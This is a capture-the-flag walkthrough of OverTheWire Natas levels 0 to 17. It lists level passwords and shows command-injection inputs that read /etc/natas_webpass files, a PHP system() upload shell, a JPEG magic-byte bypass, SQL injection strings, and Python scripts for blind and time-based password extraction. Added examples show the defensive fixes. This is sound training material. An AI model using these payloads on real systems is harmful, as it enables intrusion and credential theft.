OverTheWire-Natas
2022-07-25 14:16:00 【The goal is technology house】
https://overthewire.org/wargames/natas/
The first 17 Natas levels are done; to be updated.
1.natas0
F12
gtVrDuiDfck831PqWsLEZy5gyDz1clto
2.natas1
F12
ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi
3.natas2
Guessing related paths
F12 shows that an image is loaded from /files/pixel.png, so browse to /files: besides pixel.png there is also users.txt. Open users.txt to get the password.
sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
4.natas3
robots.txt
"No more information leaks!! Not even Google will find it this time…" is a hint pointing at robots.txt. robots.txt is the standard a website uses to communicate with web crawlers (such as Google) and other robots; it specifies which areas of the site should not be processed or scanned by the crawler.
Visit robots.txt and note Disallow: /s3cr3t/. Open that path, find user.txt, and get the password.
Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ
5.natas4
Intercept the request and modify the Referer header
Make the site believe the visit came from http://natas5.natas.labs.overthewire.org/
iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
6.natas5
Intercept the request and change the loggedin field to 1
aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
7.natas6
<?
include "includes/secret.inc";

if(array_key_exists("submit", $_POST)) {
    if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
}
?>
Visit /includes/secret.inc to obtain $secret = "FOEIUWGHFEEUHOFUOIU"; submit it as secret to get the password.
7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
8.natas7
There is a hint (an HTML comment):
<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
?page=/etc/natas_webpass/natas8
DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
9.natas8
<?
$encodedSecret = "3d3d516343746d4d6d6c315669563362";

function encodeSecret($secret) {
    return bin2hex(strrev(base64_encode($secret)));
}

if(array_key_exists("submit", $_POST)) {
    if(encodeSecret($_POST['secret']) == $encodedSecret) {
        print "Access granted. The password for natas9 is <censored>";
    } else {
        print "Wrong secret";
    }
}
?>
Undo the encoding steps in reverse order with a short PHP snippet:
<?php
$secret = "3d3d516343746d4d6d6c315669563362";
// encodeSecret() did base64_encode -> strrev -> bin2hex, so decode in reverse
echo base64_decode(strrev(hex2bin($secret)));
?>
This gives oubWYf2kBq; submit it.
W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
10.natas9
Command injection
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>
The needle value is searched for in dictionary.txt. passthru() executes a system command (similar to exec()), and the input is interpolated unquoted into the command line, so command injection is possible:
; cat /etc/natas_webpass/natas10
nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
11.natas10
grep multiple files in one call
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>
; | & are filtered, so no extra command can be appended; only grep's own arguments can be controlled. Using '' (an empty pattern) matches every line, and naming the password file as a second file makes grep print the contents of both files:
'' /etc/natas_webpass/natas11
U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK
12.natas11
Forging the cookie
<?
$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

function xor_encrypt($in) {
    $key = '<censored>';
    $text = $in;
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
        $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }

    return $outText;
}

function loadData($def) {
    global $_COOKIE;
    $mydata = $def;
    if(array_key_exists("data", $_COOKIE)) {
        $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);
        if(is_array($tempdata) && array_key_exists("showpassword", $tempdata) && array_key_exists("bgcolor", $tempdata)) {
            if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) {
                $mydata['showpassword'] = $tempdata['showpassword'];
                $mydata['bgcolor'] = $tempdata['bgcolor'];
            }
        }
    }
    return $mydata;
}

function saveData($d) {
    setcookie("data", base64_encode(xor_encrypt(json_encode($d))));
}

$data = loadData($defaultdata);

if(array_key_exists("bgcolor",$_REQUEST)) {
    if (preg_match('/^#(?:[a-f\d]{6})$/i', $_REQUEST['bgcolor'])) {
        $data['bgcolor'] = $_REQUEST['bgcolor'];
    }
}

saveData($data);
?>

<?
if($data["showpassword"] == "yes") {
    print "The password for natas12 is <censored><br>";
}
?>
The data cookie is ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxEJaAw%3D. %3D is the URL encoding of =, so the actual value is ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxEJaAw=
Step one is to recover the $key used by xor_encrypt: json-encode $defaultdata and XOR it with the base64-decoded data cookie (plaintext XOR ciphertext gives the repeating key). The key is qw8J.
Step two is to compute the forged cookie:
$test1 = base64_encode(xor_encrypt(json_encode(array( "showpassword"=>"yes", "bgcolor"=>"#ffffff"))));
which gives ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK
Step three: replace the cookie in the browser, refresh the page, and get the password.
EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3
13.natas12
Changing the file extension
if(array_key_exists("filename", $_POST)) {
    $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);

    if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
        echo "File is too big";
    } else {
        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
            echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
        } else{
            echo "There was an error uploading the file, please try again!";
        }
    }
} else {
}
The key observation is that the uploaded file's link can be accessed directly. Upload a jpg file but change the extension to php in the intercepted request so the upload succeeds, then open the link to execute the php:
<?php system("cat /etc/natas_webpass/natas13"); ?>
jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY
14.natas13
exif_imagetype
else if (! exif_imagetype($_FILES['uploadedfile']['tmp_name'])) {
    echo "File is not an image";
}
exif_imagetype() reads the first bytes of the file and checks the signature (magic number). File signatures can be looked up at https://filesignatures.net/.
So prepend a few bytes, FF D8 FF E0 (the JPEG signature), to the php file to pass the check, then intercept the request and change the extension to php.
Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1
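An added example (not code from the level or from the write-up) showing why a prefix check like exif_imagetype() proves nothing about the rest of the file, and how a server-side naming policy closes the gap that natas12 and natas13 exploit: the stored extension is derived from detected content, the client's name is discarded, and a mismatch between the two is rejected. The sample bytes, the extension map and the function names are constructed for this illustration.

```python
import os
import secrets

# Magic numbers checked below. The page cites FF D8 FF E0 (JPEG) and
# filesignatures.net; the PNG signature is added here for contrast.
SIGNATURES = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
}
# Client extensions the server is willing to accept, normalised to a detected type.
EXTENSION_TO_TYPE = {"jpg": "jpg", "jpeg": "jpg", "png": "png"}

# Constructed samples (not real uploads from the level): a PHP payload with a
# JPEG header glued on, as the write-up describes, and a bare PNG header stub.
FAKE_JPEG = b"\xff\xd8\xff\xe0" + b"<?php echo 'constructed sample'; ?>"
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16


def detect_image_type(data):
    """Prefix-only check, the same idea as exif_imagetype(): it only says that
    the first bytes look like an image, nothing about what follows."""
    for magic, kind in SIGNATURES.items():
        if data.startswith(magic):
            return kind
    return None


def magic_only_accepts(data):
    """What the level's check amounts to: accept anything with an image prefix."""
    return detect_image_type(data) is not None


def server_side_storage_name(user_filename, data):
    """Hardened handling: the server picks the stored name, the extension comes
    from the detected content, and the client's extension must agree with it.
    A client-supplied '.php' therefore never reaches disk. Returns None when
    the upload is rejected."""
    detected = detect_image_type(data)
    if detected is None:
        return None
    user_ext = os.path.splitext(user_filename)[1].lstrip(".").lower()
    if EXTENSION_TO_TYPE.get(user_ext) != detected:
        return None
    return "%s.%s" % (secrets.token_hex(16), detected)


if __name__ == "__main__":
    print("magic-only check accepts fake JPEG:", magic_only_accepts(FAKE_JPEG))
    print("hardened name for shell.php:", server_side_storage_name("shell.php", FAKE_JPEG))
    print("hardened name for photo.jpg:", server_side_storage_name("photo.jpg", FAKE_JPEG))
    print("hardened name for photo.jpg with PNG bytes:",
          server_side_storage_name("photo.jpg", PNG_STUB))
```

Note that the fake JPEG is still accepted under a .jpg name; the hardened policy does not try to prove the bytes are a real image, it only guarantees the file is never stored with an executable extension. Serving uploads from a location where the web server does not execute scripts is the complementary control.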
15.natas14
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
Construct the SQL injection: username can be anything, and password is 1" or "1" = "1
AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J
16.natas15
Blind SQL injection
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
if(array_key_exists("debug", $_GET)) {
    echo "Executing query: $query<br>";
}

$res = mysql_query($query, $link);
if($res) {
    if(mysql_num_rows($res) > 0) {
        echo "This user exists.<br>";
    } else {
        echo "This user doesn't exist.<br>";
    }
} else {
    echo "Error in query.<br>";
}

mysql_close($link);
} else {
?>
The source also provides the table definition:
CREATE TABLE `users` (
    `username` varchar(64) DEFAULT NULL,
    `password` varchar(64) DEFAULT NULL
);
Guess that the username is natas16 and then brute-force the password: when a password guess is right, mysql_num_rows($res) > 0 is satisfied. The input below tests the guess 123:
natas16" and password = "123
Below is a reference Python brute-force script. Because the PHP reads its parameters from $_REQUEST, the data can be submitted via GET.
The first half of the script determines which characters the password contains, to shrink the search space.
import requests,string

url = "http://natas15.natas.labs.overthewire.org"
auth_username = "natas15"
auth_password = "AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J"
# characters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
characters = ''.join([string.ascii_letters,string.digits])
# Begin by building a dictionary of characters found in the password
# This will greatly decrease the complexity for our brute force attempts
password_dictionary = []
exists_str = "This user exists."
for char in characters:
    # LIKE BINARY "%c%" is case-sensitive, so upper and lower case are distinct
    uri = ''.join([url,'?','username=natas16"','+and+password+LIKE+BINARY+"%',char,'%','&debug'])
    r = requests.get(uri, auth=(auth_username,auth_password))
    if exists_str in r.text:
        password_dictionary.append(char)
        print("Password Dictionary: {0}".format(''.join(password_dictionary)))
print("Dictionary build complete.")
print("Dictionary: {0}".format(''.join(password_dictionary)))
The second half of the script confirms the password one character at a time.
print("Now attempting to brute force...")
password_list = []
password = ''
for i in range(1,64):
    for char in password_dictionary:
        test = ''.join([password,char])
        # Build the GET Request: does the password start with the known prefix plus this char?
        uri = ''.join([url,'?','username=natas16"','+and+password+LIKE+BINARY+"',test,'%','&debug'])
        # Send the HTTP GET request to the server
        r = requests.get(uri, auth=(auth_username,auth_password))
        # Parse the HTTP response
        if exists_str in r.text:
            password_list.append(char)
            password = ''.join(password_list)
            print("Length: {0}, Password: {1}".format(len(password),password))
            break  # move on to the next position
    else:
        break  # no character matched: the password is complete
WaIHEacj63wnNIBROHeqi3p9t0m5nhmh
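The following Python is an added example that is not part of the write-up: it rebuilds the natas14 and natas15 query patterns against an in-memory SQLite table (the table layout is the one quoted above; the stored password is made up) and contrasts string concatenation with a parameterised query, which is the fix for both levels. Single quotes are used for string literals because SQLite treats double-quoted strings as identifiers; SQLite also lacks MySQL's LIKE BINARY, so LIKE here is case-insensitive, which does not affect the point.

```python
import sqlite3

# Constructed fixture mirroring the CREATE TABLE shown for the level. The stored
# password is made up; it is not a Natas password.
ROWS = [("natas16", "Wz9constructedPassword")]


def make_db():
    """In-memory SQLite database with the users table from the write-up."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username varchar(64), password varchar(64))")
    conn.executemany("INSERT INTO users VALUES (?, ?)", ROWS)
    return conn


def login_vulnerable(conn, username, password):
    """natas14 pattern: both inputs are concatenated into the query string.
    A password such as 1' or '1'='1 turns the WHERE clause into a tautology."""
    query = ("SELECT * FROM users WHERE username='" + username
             + "' AND password='" + password + "'")
    return len(conn.execute(query).fetchall()) > 0


def user_exists_vulnerable(conn, username):
    """natas15 pattern: only the username is queried, and the page reports
    whether a row came back. That yes/no answer is the boolean oracle the
    script above drives with LIKE, one character at a time."""
    query = "SELECT * FROM users WHERE username='" + username + "'"
    return len(conn.execute(query).fetchall()) > 0


def login_safe(conn, username, password):
    """Parameterised query: the inputs are bound as values, never parsed as SQL."""
    query = "SELECT * FROM users WHERE username=? AND password=?"
    return len(conn.execute(query, (username, password)).fetchall()) > 0


def user_exists_safe(conn, username):
    """Same as above for the single-column lookup; the whole input is the username."""
    query = "SELECT * FROM users WHERE username=?"
    return len(conn.execute(query, (username,)).fetchall()) > 0


if __name__ == "__main__":
    conn = make_db()
    tautology = "1' or '1'='1"  # the natas14 input, rewritten with single quotes
    print("natas14 bypass, concatenated:", login_vulnerable(conn, "anything", tautology))
    print("natas14 bypass, parameterised:", login_safe(conn, "anything", tautology))
    probe = "natas16' AND password LIKE 'W%"  # natas15-style oracle question
    print("natas15 oracle, concatenated:", user_exists_vulnerable(conn, probe))
    print("natas15 oracle, parameterised:", user_exists_safe(conn, probe))
```

With parameters bound, the natas15 probe is simply a username that happens to contain quotes and the word LIKE; no such user exists, so the oracle always answers no and the character-by-character extraction has nothing to work with.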
17.natas16
Command substitution
if($key != "") {
    if(preg_match('/[;|&`\'"]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i \"$key\" dictionary.txt");
    }
}
Command substitution replaces a command with its output. It occurs when a command is written in either of the following forms:
$(command)
`command`
Write a script that substitutes a command's output into the needle. An empty string cannot be submitted, so characters have to be tried one by one.
If /etc/natas_webpass/natas17 does not contain a, the inner command has no output and grep whitest runs, so whitest appears in the output; if it does contain a, the needle becomes whitestXXX, which is not in the dictionary, and the output is empty.
So if whitest is absent from the output, /etc/natas_webpass/natas17 contains that character.
whitest$(grep ^a /etc/natas_webpass/natas17)
The script first tests which characters the password contains, then tests the leading characters one by one. ^ anchors the match to the start of the line.
import requests,string

url = "http://natas16.natas.labs.overthewire.org"
auth_username = "natas16"
auth_password = "WaIHEacj63wnNIBROHeqi3p9t0m5nhmh"
characters = ''.join([string.ascii_letters,string.digits])
# Step 1: find which characters occur anywhere in the password
password_dictionary = []
for char in characters:
    uri = ''.join([url,'?','needle=whitest$(grep ',char,' /etc/natas_webpass/natas17)'])
    r = requests.get(uri, auth=(auth_username,auth_password))
    if "whitest" not in r.text:
        password_dictionary.append(char)
        print(''.join(password_dictionary))
print("Dictionary build complete.")
# Step 2: extend the known prefix one character at a time, anchored with ^
print("Now attempting to brute force...")
password_list = []
password = ''
for i in range(1,64):
    for char in password_dictionary:
        test = ''.join([password,char])
        # Build the GET Request
        uri = ''.join([url,'?','needle=whitest$(grep ^',test,' /etc/natas_webpass/natas17)'])
        # Send the HTTP GET request to the server
        r = requests.get(uri, auth=(auth_username,auth_password))
        # Parse the HTTP response
        if "whitest" not in r.text:
            password_list.append(char)
            password = ''.join(password_list)
            print("Length: {0}, Password: {1}".format(len(password),password))
            break  # move on to the next position
    else:
        break  # no character matched: the password is complete
8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
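Added example (not from the write-up): the input filters from natas10 and natas16 next to an allowlist, checked against the needle values quoted on this page for natas9, natas10 and natas16, plus the two ways of passing the needle to grep that leave the shell nothing to interpret. The allowlist pattern and the function names are assumptions made for this illustration.

```python
import re
import shlex

# The filters as they appear in the PHP above: natas9 has none, natas10
# blocks ; | &, natas16 additionally blocks the backtick and both quotes.
NATAS10_FILTER = re.compile(r"[;|&]")
NATAS16_FILTER = re.compile(r"[;|&`'\"]")
# A positive definition of an acceptable dictionary lookup (assumption: the
# application only ever needs alphanumeric needles of bounded length).
NEEDLE_ALLOWLIST = re.compile(r"[A-Za-z0-9]{1,64}")

# The needle values quoted in the write-up for each level
PAGE_INPUTS = {
    "natas9": "; cat /etc/natas_webpass/natas10",
    "natas10": "'' /etc/natas_webpass/natas11",
    "natas16": "whitest$(grep ^a /etc/natas_webpass/natas17)",
}


def passes_blacklist(pattern, needle):
    """True when the level's preg_match() would let the input through."""
    return pattern.search(needle) is None


def passes_allowlist(needle):
    """True only when every character is one the application expects."""
    return NEEDLE_ALLOWLIST.fullmatch(needle) is not None


def shell_command_as_built(needle):
    """The string natas16's passthru() hands to /bin/sh: the input sits inside
    double quotes, and the shell still performs $(...) substitution there."""
    return 'grep -i "%s" dictionary.txt' % needle


def shell_command_escaped(needle):
    """If a shell string is unavoidable, single-quote the whole argument (the
    shlex.quote counterpart of PHP's escapeshellarg); nothing inside expands."""
    return "grep -i %s dictionary.txt" % shlex.quote(needle)


def grep_argv(needle):
    """Preferred form: an argv list executed without a shell, so the needle is
    one opaque argument, and -- stops grep from reading it as an option."""
    return ["grep", "-i", "--", needle, "dictionary.txt"]


if __name__ == "__main__":
    for level, needle in PAGE_INPUTS.items():
        print(level, "| natas10 filter:", passes_blacklist(NATAS10_FILTER, needle),
              "| natas16 filter:", passes_blacklist(NATAS16_FILTER, needle),
              "| allowlist:", passes_allowlist(needle))
    print(shell_command_as_built(PAGE_INPUTS["natas16"]))
    print(shell_command_escaped(PAGE_INPUTS["natas16"]))
    print(grep_argv(PAGE_INPUTS["natas16"]))
```

Each blacklist stops the previous level's input and lets the next one through, which is the usual life cycle of a deny list; the allowlist rejects all three without knowing any of them. The argv form is the one to reach for, since it removes the shell from the path entirely instead of trying to quote for it.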
18.natas17
/* CREATE TABLE `users` ( `username` varchar(64) DEFAULT NULL, `password` varchar(64) DEFAULT NULL ); */
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
if(array_key_exists("debug", $_GET)) {
    echo "Executing query: $query<br>";
}

$res = mysql_query($query, $link);
if($res) {
    if(mysql_num_rows($res) > 0) {
        //echo "This user exists.<br>";
    } else {
        //echo "This user doesn't exist.<br>";
    }
} else {
    //echo "Error in query.<br>";
}

mysql_close($link);
Submit the following input and note that the page takes noticeably longer to return. Since the page no longer prints whether the user exists, sleep() serves as the oracle instead: the delay shows whether the preceding condition is true (time-based blind injection).
natas18" and sleep(5)#